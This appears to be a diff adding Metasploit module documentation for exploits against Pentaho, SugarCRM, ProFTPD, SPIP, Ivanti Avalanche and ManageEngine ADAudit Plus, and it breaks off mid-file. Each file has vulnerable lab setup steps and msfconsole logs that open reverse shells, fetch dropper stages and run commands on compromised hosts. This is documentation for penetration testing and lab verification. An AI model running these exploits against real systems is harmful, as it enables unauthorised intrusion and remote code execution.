+                                19 68 5e ab 26 5e 2a 4d 86 1e d1 72 d4 50 a7 cf 4a 67 3c 9f a6 70 6f 8a 85 b6 ca 35 1b f6 03 16 c5 e8 a2 9f 33 6f 36 95 7f fd 65 55 48 fc 14 fa 8c c8 c2 a5 ef 6
+                                e 2a 79 86 3b 3d 2c 8c 2a 55 96 a4 6f eb cf 6e 65 07 5d 4c b6 fc 55 45 05 46 4a
+win-brshgjgidfm$  DAFOREST.COM  (null)
+
+
+meterpreter >
+```
+
+### Windows 11 22H2 pentaho-business-analytics-9.3.0.0-428-x64.exe
+```
+msf6 > use multi/http/pentaho_business_server_authbypass_and_ssti
+[*] Using configured payload cmd/unix/reverse_openssl
+msf6 exploit(multi/http/pentaho_business_server_authbypass_and_ssti) > set rhosts 172.16.199.138
+rhosts => 172.16.199.138
+msf6 exploit(multi/http/pentaho_business_server_authbypass_and_ssti) > set lhost 172.16.199.1
+lhost => 172.16.199.1
+msf6 exploit(multi/http/pentaho_business_server_authbypass_and_ssti) > set target 2
+target => 2
+msf6 exploit(multi/http/pentaho_business_server_authbypass_and_ssti) > options
+
+Module options (exploit/multi/http/pentaho_business_server_authbypass_and_ssti):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     172.16.199.138   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      8080             yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /pentaho         yes       Base path
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   VHOST                       no        HTTP server virtual host
+
+
+   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+
+
+Payload options (cmd/windows/powershell_reverse_tcp):
+
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   LHOST         172.16.199.1     yes       The listen address (an interface may be specified)
+   LOAD_MODULES                   no        A list of powershell modules separated by a comma to download over the web
+   LPORT         4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   2   Windows Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(multi/http/pentaho_business_server_authbypass_and_ssti) > run
+
+[*] Started reverse TCP handler on 172.16.199.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[*] Attempting to exploit...
+[*] Powershell session session 1 opened (172.16.199.1:4444 -> 172.16.199.138:51232) at 2023-05-03 15:07:11 -0400
+
+PS C:\Pentaho\server\pentaho-server\tomcat> whoami
+nt authority\local service
+PS C:\Pentaho\server\pentaho-server\tomcat> systeminfo
+
+Host Name:                 MSFDEVICE
+OS Name:                   Microsoft Windows 11 Home
+OS Version:                10.0.22621 N/A Build 22621
+```
+
+### Mac OS X Catalina pentaho-business-analytics-9.3.0.0-428-x64.app
+```
+msf6 > use multi/http/pentaho_business_server_authbypass_and_ssti
+[*] Using configured payload cmd/unix/reverse_openssl
+msf6 exploit(multi/http/pentaho_business_server_authbypass_and_ssti) > set rhosts 172.16.199.132
+rhosts => 172.16.199.132
+msf6 exploit(multi/http/pentaho_business_server_authbypass_and_ssti) > set lhost 172.16.199.1
+lhost => 172.16.199.1
+msf6 exploit(multi/http/pentaho_business_server_authbypass_and_ssti) > set payload cmd/unix/reverse_python
+payload => cmd/unix/reverse_python
+msf6 exploit(multi/http/pentaho_business_server_authbypass_and_ssti) > options
+
+Module options (exploit/multi/http/pentaho_business_server_authbypass_and_ssti):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     172.16.199.132   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      8080             yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /pentaho         yes       Base path
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   VHOST                       no        HTTP server virtual host
+
+
+   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+
+
+Payload options (cmd/unix/reverse_python):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  172.16.199.1     yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+   SHELL  /bin/sh          yes       The system shell to use
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(multi/http/pentaho_business_server_authbypass_and_ssti) > run
+
+[*] Started reverse TCP handler on 172.16.199.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[*] Attempting to exploit...
+[*] Command shell session 1 opened (172.16.199.1:4444 -> 172.16.199.132:49391) at 2023-05-03 15:14:07 -0400
+
+id
+uid=501(msfuser) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),701(com.apple.sharepoint.group.1),33(_appstore),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh),400(com.apple.access_remote_ae)
+uname -a
+Darwin msfusers-Mac.local 19.3.0 Darwin Kernel Version 19.3.0: Thu Jan  9 20:58:23 PST 2020; root:xnu-6153.81.5~1/RELEASE_X86_64 x86_64
+```
@@ -0,0 +1,195 @@
+## Vulnerable Application
+
+This module exploits CVE-2023-22952, a Remote Code Execution (RCE) vulnerability in SugarCRM 11.0 Enterprise,
+Professional, Sell, Serve, and Ultimate versions prior to `11.0.5` and SugarCRM 12.0 Enterprise, Sell, and
+Serve versions prior to `12.0.2`.
+
+The vulnerability occurs due to a lack of appropriate validation when uploading a malicious `PNG` file with
+embedded PHP code to the `/cache/images/` directory on the web server using the vulnerable endpoint
+`/index.php?module=EmailTemplates&action=AttachFiles`. Once uploaded to the server, depending on server configuration,
+the attacker can access the malicious PNG file via HTTP or HTTPS, thereby executing the malicious PHP code and
+gaining access to the system.
+
+This vulnerability does not require authentication because there is a missing authentication check in the
+`loadUser()` method in `include/MVC/SugarApplication.php`. After a failed login, the session does not get
+destroyed and hence the attacker can continue to send valid requests to the application. See this
+[AttackerKB Article](https://attackerkb.com/topics/E486ui94II/cve-2023-22952) for more details.
+
+Because of this, any remote attacker, regardless of authentication, can exploit this vulnerability to gain
+access to the underlying operating system as the user that the web services are running as (typically `www-data`).
+
+Installing a vulnerable test bed requires a Linux machine with the vulnerable SugarCRM software loaded.
+Follow instructions [here](https://support.sugarcrm.com/Documentation/Sugar_Versions/11.0/Ent/Installation_and_Upgrade_Guide/),
+but you need to be registered as a sugarcrm customer in order to access the software.
+This module has been tested against a SugarCRM installation with the specifications listed below:
+
+* SugarCRM Enterprise Edition
+* Version: `11.0.4`
+* Build: `300`
+* Linux OS: Debian 8.6
+
+## Verification Steps
+
+1. `use exploit/multi/http/sugarcrm_webshell_cve_2023_22952`
+1. `set RHOSTS <TARGET HOSTS>`
+1. `set RPORT <port>`
+1. `set LHOST <attacker host ip>`
+1. `set LPORT <attacker host port>`
+1. `set TARGET <0-PHP, 1-Unix command or 2-Linux Dropper>`
+1. `exploit`
+1. You should get a `bash` shell or `meterpreter` session depending on the target and payload settings.
+
+## Options
+
+### WEBSHELL
+You can use this option to set the filename and extension of the webshell.
+This is handy if you want to test the webshell upload and execution with different file extensions (.phtml, .php7, .inc)
+to bypass any security settings on the Web and PHP server.
+
+### COMMAND
+This option provides the user to choose the PHP underlying shell command function to be used for execution.
+The choices are `system()`, `passthru()`, `shell_exec()` and `exec()` and it defaults to `passthru()`.
+This option is only available when the target selected is either Unix Command or Linux Dropper.
+For the native PHP target, by default the `eval()` function will be used for native PHP code execution.
+
+## Scenarios
+
+### SugarCRM 11.0.4 Enterprise Build 300 on Debian 8.6 - PHP Meterpreter session
+```
+msf6 > use exploit/multi/http/sugarcrm_webshell_cve_2023_22952
+[*] Using configured payload php/meterpreter/reverse_tcp
+msf6 exploit(multi/http/sugarcrm_webshell_cve_2023_22952) > options
+
+Module options (exploit/multi/http/sugarcrm_webshell_cve_2023_22952):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT      80               yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       SugarCRM base url
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   VHOST                       no        HTTP server virtual host
+   WEBSHELL                    no        The name of the webshell with extension to trick the parser like .phtml, .phar, etc. Webshell
+                                         name will be randomly generated if left unset.
+
+
+   When TARGET is not 0:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   COMMAND  passthru         yes       Use PHP command function (Accepted: passthru, shell_exec, system, exec)
+
+
+   When CMDSTAGER::FLAVOR is one of auto,certutil,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or
+                                        0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+
+
+Payload options (php/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   PHP
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(multi/http/sugarcrm_webshell_cve_2023_22952) > set rhosts 192.168.100.180
+rhosts => 192.168.100.180
+msf6 exploit(multi/http/sugarcrm_webshell_cve_2023_22952) > set lhost 192.168.100.254
+lhost => 192.168.100.254
+msf6 exploit(multi/http/sugarcrm_webshell_cve_2023_22952) > set lport 4444
+lport => 4444
+msf6 exploit(multi/http/sugarcrm_webshell_cve_2023_22952) > set target 0
+target => 0
+msf6 exploit(multi/http/sugarcrm_webshell_cve_2023_22952) > exploit
+
+[*] Started reverse TCP handler on 192.168.100.254:4444
+[*] Executing PHP for php/meterpreter/reverse_tcp
+[*] Sending stage (39927 bytes) to 192.168.100.180
+[+] Deleted cXSbMSaTtcnn.phtml
+[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:52584) at 2023-02-15 14:11:23 +0000
+
+meterpreter > sysinfo
+Computer     : sugarcrm
+OS           : Debian 8.6 (Linux 2.6.32)
+Meterpreter  : php/linux
+meterpreter > getuid
+Server username: www-data
+meterpreter > exit
+```
+
+### SugarCRM 11.0.4 Enterprise Build 300 on Debian 8.6 - bash reverse shell
+```
+msf6 exploit(multi/http/sugarcrm_webshell_cve_2023_22952) > set rhosts 192.168.100.180
+rhosts => 192.168.100.180
+msf6 exploit(multi/http/sugarcrm_webshell_cve_2023_22952) > set lhost 192.168.100.254
+lhost => 192.168.100.254
+msf6 exploit(multi/http/sugarcrm_webshell_cve_2023_22952) > set lport 4444
+lport => 4444
+msf6 exploit(multi/http/sugarcrm_webshell_cve_2023_22952) > set target 1
+target => 1
+msf6 exploit(multi/http/sugarcrm_webshell_cve_2023_22952) > exploit
+
+[*] Started reverse TCP handler on 192.168.100.254:4444
+[*] Executing Unix Command for cmd/unix/reverse_bash
+[+] Deleted RPXrYGLCvGjL.phar
+[*] Command shell session 2 opened (127.0.0.1:4444 -> 127.0.0.1:52584) at 2023-01-19 19:14:56 +0000
+
+whoami
+www-data
+exit
+```
+
+### SugarCRM 11.0.4 Enterprise Build 300 on Debian 8.6 - Linux Meterpreter session
+```
+msf6 exploit(multi/http/sugarcrm_webshell_cve_2023_22952) > set rhosts 192.168.100.180
+rhosts => 192.168.100.180
+msf6 exploit(multi/http/sugarcrm_webshell_cve_2023_22952) > set lhost 192.168.100.254
+lhost => 192.168.100.254
+msf6 exploit(multi/http/sugarcrm_webshell_cve_2023_22952) > set lport 4444
+lport => 4444
+msf6 exploit(multi/http/sugarcrm_webshell_cve_2023_22952) > set target 2
+target => 2
+msf6 exploit(multi/http/sugarcrm_webshell_cve_2023_22952) > exploit
+
+[*] Started reverse TCP handler on 192.168.100.254:4444
+[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
+[*] Using URL: http://192.168.100.254:8080/aLYDt2
+[*] Client 127.0.0.1 (Wget/1.16 (linux-gnu)) requested /aLYDt2
+[*] Sending payload to 127.0.0.1 (Wget/1.16 (linux-gnu))
+[*] Sending stage (3045348 bytes) to 127.0.0.1
+[+] Deleted ZxGTSVGsOUZs.phtml
+[*] Meterpreter session 3 opened (127.0.0.1:4444 -> 127.0.0.1:43076) at 2023-01-19 19:16:07 +0000
+[*] Command Stager progress - 100.00% done (121/121 bytes)
+[*] Server stopped.
+
+meterpreter > sysinfo
+Computer     : sugarcrm
+OS           : Debian 8.6 (Linux 2.6.32)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > getuid
+Server username: www-data
+meterpreter > exit
+```
+
+## Limitations
+No `check` method.
@@ -0,0 +1,95 @@
+## Vulnerable Application
+
+This module exploits the SITE CPFR/CPTO mod_copy commands in ProFTPD version 1.3.5.
+Any unauthenticated client can leverage these commands to copy files from any
+part of the filesystem to a chosen destination. The copy commands are executed with
+the rights of the ProFTPD service, which by default runs under the privileges of the
+'nobody' user. By using /proc/self/cmdline to copy a PHP payload to the website
+directory, PHP remote code execution is made possible.
+
+
+## Installation Steps
+
+Download and build:
+
+```sh
+sudo apt install gcc make
+wget ftp://ftp.proftpd.org/distrib/source/proftpd-1.3.5.tar.gz
+tar zxvf proftpd-1.3.5.tar.gz
+cd proftpd-1.3.5
+./configure --with-modules=mod_copy
+make
+```
+
+Run ProFTPD using the sample default configuration file (in foreground with `-n` flag for testing):
+
+```
+sudo ./proftpd -n -c "`pwd`/sample-configurations/basic.conf"
+```
+
+Set up a web server with a world-writable directory:
+
+```
+sudo apt install php apache2
+sudo mkdir /home/var/www/html/test
+sudo chmod 777 /var/www/html/test
+```
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use exploit/unix/ftp/proftpd_modcopy_exec`
+1. Do: `set rhosts <rhosts>`
+1. Do: `set rport_ftp <remote ftp port>`
+1. Do: `set tmppath <writable temporary file path>`
+1. Do: `set sitepath <writable web server file path>`
+1. Do: `run`
+1. You should get a new session.
+
+## Options
+
+### RPORT_FTP
+
+FTP port (default: `21`)
+
+### TMPPATH
+
+Absolute writable path (default: `/tmp`)
+
+### SITEPATH
+
+Absolute writable website path (default: `/var/www`)
+
+
+## Scenarios
+
+### ProFTPD 1.3.5 on Ubuntu 22.04
+
+```
+msf6 > use exploit/unix/ftp/proftpd_modcopy_exec
+[*] No payload configured, defaulting to cmd/unix/reverse_netcat
+msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set rhosts 192.168.200.158
+rhosts => 192.168.200.158
+msf6 exploit(unix/ftp/proftpd_modcopy_exec) > check
+[*] 192.168.200.158:80 - The target appears to be vulnerable. 192.168.200.158:21 - Unauthenticated SITE CPFR command was successful
+msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set sitepath /var/www/html/test
+sitepath => /var/www/html/test
+msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set targeturi /test
+targeturi => /test
+msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set payload cmd/unix/reverse_perl
+payload => cmd/unix/reverse_perl
+msf6 exploit(unix/ftp/proftpd_modcopy_exec) > run
+
+[*] Started reverse TCP handler on 192.168.200.130:4444 
+[*] 192.168.200.158:80 - 192.168.200.158:21 - Connected to FTP server
+[*] 192.168.200.158:80 - 192.168.200.158:21 - Sending copy commands to FTP server
+[*] 192.168.200.158:80 - Executing PHP payload /test/EbzQzU.php
+[+] 192.168.200.158:80 - Deleted /var/www/html/test/EbzQzU.php
+[*] Command shell session 1 opened (192.168.200.130:4444 -> 192.168.200.158:46352) at 2023-03-19 00:22:49 -0400
+
+id
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+pwd
+/var/www/html/test
+```
@@ -0,0 +1,190 @@
+## Vulnerable Application
+
+This module exploits a PHP code injection in SPIP. The vulnerability exists in
+the `oubli` parameter and allows an unauthenticated user to execute arbitrary
+commands with web user privileges. Branches 3.2, 4.0, 4.1 and 4.2 are
+concerned. Vulnerable versions are <3.2.18, <4.0.10, <4.1.18 and <4.2.1.
+
+The module's `check` method attempts to obtain the SPIP version via a simple HTTP GET request to `/spip.php`
+page and fingerprints it either via the `generator` meta tag, or by the
+`Composed-By` header.
+
+This module has been successfully tested against SPIP version 4.0.0.
+
+## Setup
+
+On Ubuntu 20.04, download a vulnerable instance of SPIP:
+
+```
+wget https://files.spip.net/spip/archives/spip-v4.2.0.zip
+```
+
+Unzip it to a specific folder:
+
+```
+mkdir spip-site 
+cp spip-v4.2.0.zip spip-site/ 
+cd spip-site / 
+unzip spip-v4.2.0.zip
+```
+
+Install php and the necessary extensions:
+
+```
+sudo apt install -y php-xml php-zip php-sqlite3
+```
+
+Serve the application (while in the newly created spip-site directory):
+
+```
+php -S 127.0.0.1:8000
+```
+
+Navigate to the following URL, select `sqlite` for the database, and complete the installation:
+
+```
+http://127.0.0.1:8000/ecrire/
+```
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use exploit/unix/webapp/spip_rce_form`
+3. Do: `set RHOSTS [IP]`
+4. Do: `set LHOST [IP]`
+5. Do: `exploit`
+
+## Options
+### TARGETURI
+The base path to PIP. The default value is `/`.
+
+## Targets
+
+### 0 (Linux Dropper)
+
+This uses a Linux dropper to execute code.
+
+### 1 (Unix Command)
+
+This executes a Unix command.
+
+## Scenarios
+### SPIP 4.0.0 - Linux target - PHP In-Memory
+```
+
+Module options (exploit/unix/webapp/spip_rce_form):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     127.0.0.1        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      8080             yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       The base path to SPIP application
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (php/exec):
+
+   Name  Current Setting       Required  Description
+   ----  ---------------       --------  -----------
+   CMD   touch /tmp/pwned.txt  yes       The command string to execute
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+=>  0   Automatic (PHP In-Memory)
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(unix/webapp/spip_rce_form) > run
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] SPIP Version detected: 4.0.0
+[+] The target appears to be vulnerable.
+[*] Got anti-csrf token: fDBVRjMENBhztAcYFvRr+49sl+fSbkKWDtcOmHtIo0Ta5iJ1MNTCax9uYvLZYlhtD77tZ0TcgnhyRwE=
+[*] 127.0.0.1:8080 - Attempting to exploit...
+[*] Exploit completed, but no session was created.
+
+-rw-rw-rw- 1 jvoisin jvoisin 0 Feb 28 20:45 /tmp/pwned.txt
+msf6 exploit(unix/webapp/spip_rce_form) > 
+```
+
+### SPIP 4.0.0 - Linux target - UNIX In-Memory
+
+```
+msf6 exploit(unix/webapp/spip_rce_form) > options 
+
+Module options (exploit/unix/webapp/spip_rce_form):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     127.0.0.1        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      8080             yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       The base path to SPIP application
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   VHOST                       no        HTTP server virtual host
+
+
+   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+
+
+Payload options (cmd/unix/reverse_openssl):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  localhost        yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Automatic (Unix In-Memory)
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(unix/webapp/spip_rce_form) > set payload cmd/unix/reverse_openssl
+payload => cmd/unix/reverse_openssl
+msf6 exploit(unix/webapp/spip_rce_form) > run
+
+[!] You are binding to a loopback address by setting LHOST to ::1. Did you want ReverseListenerBindAddress?
+[*] Started reverse double SSL handler on ::1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] SPIP Version detected: 4.0.0
+[+] The target appears to be vulnerable.
+[*] Got anti-csrf token: fDBVRjMENBhztAcYFvRr+49sl+fSbkKWDtcOmHtIo0Ta5iJ1MNTCax9uYvLZYlhtD77tZ0TcgnhyRwE=
+[*] 127.0.0.1:8080 - Attempting to exploit...
+[*] Accepted the first client connection...
+[*] Accepted the second client connection...
+[*] Command: echo v5zOS2N6c977VY0X;
+[*] Writing to socket A
+[*] Writing to socket B
+[*] Reading from sockets...
+[*] Reading from socket A
+[*] A: "v5zOS2N6c977VY0X\n"
+[*] Matching...
+[*] B is input...
+[*] Command shell session 2 opened (::1:4444 -> ::1:38048) at 2023-04-10 21:30:25 +0200
+^Z
+Background session 1? [y/N]  y
+msf6 exploit(unix/webapp/spip_rce_form) > sessions -i 2 -c whoami
+[*] Running 'whoami' on shell session 2 (127.0.0.1)
+jvoisin
+
+msf6 exploit(unix/webapp/spip_rce_form) >
+```
@@ -0,0 +1,126 @@
+## Vulnerable Application
+
+For versions of Ivanti Avalanche below `v6.4.0.186`, an authenticated administrator
+can change the default path for the Central FileStore via the Configuration Settings pane.
+While the default path is set to `C:\Program Files\Wavelink\Avalanche\EnterpriseServer\centralfilestore\files`,
+Ivanti Avalanche restricts the path from being set to folders within the `Windows` and
+`Program Files` directories. These restrictions do not account for MS-DOS (8.3) path
+names, which can be used to set the Central FileStore path to the web root of the application.
+This module leverages this vulnerability to upload a JSP web shell and gain RCE as `NT AUTHORITY\SYSTEM`.
+
+### Installation Instructions
+
+The software requires a version of MSSQL Server to be installed. The installation
+instructions use MSSQL Server 2012, but 2017 worked for my setup. Ensure that
+`SQL Server and Windows Authentication Mode` is selected as the default for
+server authentication. This can either be done at installation or via
+SQL Server Management Studio, available from https://learn.microsoft.com/en-us/sql/ssms/download-sql-server-management-studio-ssms.
+
+1. Open SQL Server Management Studio and connect to the instance
+2. Right click on the instance and select `Properties`
+3. Click the `Security` page
+4. Underneath `Server Authentication`, select `SQL Server and Windows Authentication Mode` and `Ok`.
+5. Open SQL Server Configuration Manager -> SQL Server Network Configuration -> Protocols for MSSQLSERVER -> TCP/IP -> Change from Disable to Enabled.
+6. SQL Server Configuration Manager -> SQL Server Services -> Stop all Services -> Start just the SQL Server (MSSQLSERVER) service.
+7. Go back to SQL Server Management Studio.
+8. Security -> Logins -> sa -> Right click -> Select Properties -> Status -> Toggle Login to Enabled -> Ok
+9. Execute the following SQL statement in SQL Server Management Studio: `ALTER LOGIN sa WITH PASSWORD = 'theSAUser123';`
+10. You should now be able to run the installer and set the hostname to `127.0.0.1`, set the username to `sa`, and the password to `theSAUser123`.
+11. Hitting the next button and accept the rest of the defaults.
+12. When it comes to setting up the TomCat connectors, be sure to enable the HTTP and HTTPS services and adjust the ports if there are any port conflicts.
+13. You should now have a complete install available.
+
+In case the above doesn't work, instructions for installing Ivanti Avalanche can be found [here](https://forums.ivanti.com/s/article/Best-Known-Method-for-installing-Avalanche-6-x-using-MSSQL-Server-2008-R2-Express-DB-or-2012-Express-Advanced?language=en_US)
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/windows/http/ivanti_avalanche_filestoreconfig_upload`
+4. Do: `set USERNAME <uname>`
+5. Do: `set PASSWORD <pass>`
+6. Do: `set RHOST <ip>`
+7. Do: `run`
+8. You should get a shell as `NT AUTHORITY\SYSTEM`.
+
+## Options
+
+### USERNAME
+
+An admin user with which to log into the software
+
+### PASSWORD
+
+Password belonging to admin user
+
+## Scenarios
+
+### Ivanti Avalanche v6.3.4.153 - Windows 10 x64
+
+```
+msf6 > use exploit/windows/http/ivanti_avalanche_filestoreconfig_upload
+[*] No payload configured, defaulting to generic/shell_reverse_tcp
+msf6 exploit(windows/http/ivanti_avalanche_filestoreconfig_upload) > set rhost 192.168.140.150
+rhost => 192.168.140.150
+msf6 exploit(windows/http/ivanti_avalanche_filestoreconfig_upload) > set lhost 192.168.140.1
+lhost => 192.168.140.1
+msf6 exploit(windows/http/ivanti_avalanche_filestoreconfig_upload) > options
+
+Module options (exploit/windows/http/ivanti_avalanche_filestoreconfig_upload):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   PASSWORD   admin            yes       Password to log in with
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.140.150  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics
+                                         /using-metasploit.html
+   RPORT      8080             yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /AvalancheWeb    yes       The URI of the Example Application
+   USERNAME   amcadmin         yes       User name to log in with
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (generic/shell_reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.140.1    yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic Target
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(windows/http/ivanti_avalanche_filestoreconfig_upload) > run
+
+[*] Started reverse TCP handler on 192.168.140.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[*] Original FileStore config path: 'C:\Program Files\Wavelink\Avalanche\EnterpriseServer\centralfilestore\files'
+[*] Changing FileStore config path to 'C:\PROGRA~1\Wavelink\AVALAN~1\Web'
+[+] Successfully uploaded 'LWRrxDXWxhbz.jsp'
+[*] Attempting to restore config path
+[!] Tried to delete webapps/LWRrxDXWxhbz.jsp, unknown result
+[*] Command shell session 1 opened (192.168.140.1:4444 -> 192.168.140.150:50249) at 2023-05-08 14:27:58 -0500
+[!] Failed to restore the FileStore config path to its original path. Please manually restore FileStore config via Tools -> Central FileStore -> Configurations.
+
+
+Shell Banner:
+Microsoft Windows [Version 10.0.19041.630]
+-----
+
+
+C:\Program Files\Wavelink\Avalanche\Web>whoami
+whoami
+nt authority\system
+
+C:\Program Files\Wavelink\Avalanche\Web>
+```
@@ -0,0 +1,467 @@
+## Vulnerable Application
+This module exploits security issues in ManageEngine ADAudit Plus prior to 7006 that allow authenticated users to execute arbitrary code
+by creating a custom alert profile and leveraging the custom alert script component.
+
+This module first runs a few checks to test the provided credentials, retrieve the configured domain(s), and
+obtain the build number of ManageEngine. If the credentials are valid and the target is vulnerable, the module
+creates an alert profile that will be triggered for any failed login attempt to the configured domain.
+
+For versions prior to build 7004, the payload is directly inserted in the custom alert script component of the alert profile.
+
+For builds 7004 and 7005, the module leverages an arbitrary file write vulnerability (CVE-2021-42847) to create a Powershell script
+in the `alert_scripts` directory that contains the payload. Note that this directory will be located under the
+ADAudit Plus installation directory. The name of this script is then provided as the value for the
+custom alert script component of the alert profile. For these builds, Meterpreter payloads such as
+`cmd/windows/powershell/meterpreter/reverse_tcp` do not seem to work and only the `cmd/windows/powershell_reverse_tcp`
+payload has been tested successfully.
+
+This module will automatically delete the created alert profile before completing. This happens even if no shell was obtained.
+
+It should be noted that during a single run, the module will typically authenticate to the target several times.
+This is because ADAudit Plus is very strict about cookies. After a user performs a successful authentication request,
+the server sends a cookie that can be used to visit the dashboard. However, in order to interact with most of the API 
+endpoints, the user must then perform a request to `api/json/configuredDomainsList`. Only then does the server return a
+cookie that can be used to interact with other endpoints. If the above requests are not performed in this exact order,
+or additional requests are performed before the final cookie is obtained, the entire authentication chain needs to be repeated.
+
+This module requires valid credentials for an account with the privileges to create alert scripts.
+It has been successfully tested against ManageEngine ADAudit Plus builds
+[7003](https://archives2.manageengine.com/active-directory-audit/7003/ManageEngine_ADAudit_Plus_x64.exe) and
